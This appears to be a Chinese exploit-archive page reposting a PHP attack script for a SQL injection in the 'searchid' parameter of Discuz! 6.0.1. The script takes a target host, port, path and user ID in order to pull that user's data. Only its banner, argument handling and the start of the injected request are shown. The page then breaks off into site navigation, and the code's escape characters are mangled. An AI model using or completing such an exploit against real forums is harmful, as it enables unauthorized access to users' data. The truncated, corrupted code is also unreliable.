Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
发布时间:2016-12-21 来源:查字典编辑
摘要:

<?php

error_reporting(E_ALL&E_NOTICE);

print_r("

------------------------------------------------------------------

Exploit discuz6.0.1

Just work as php>=5 & mysql>=4.1

BY james

------------------------------------------------------------------

");

if($argc>4)

{

$host=$argv[1];

$port=$argv[2];

$path=$argv[3];

$uid=$argv[4];

}else{

echo "Usage: php ".$argv[0]." host port path uidn";

echo "host: target server n";

echo "port: the web port, usually 80n";

echo "path: path to discuzn";

echo "uid : user ID you wanna getn";

echo "Example:rn";

echo "php ".$argv[0]." localhost 80 1n";

exit;

}

$content ="action=search&searchid=22

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新Exploit学习
热门Exploit学习
网络安全子分类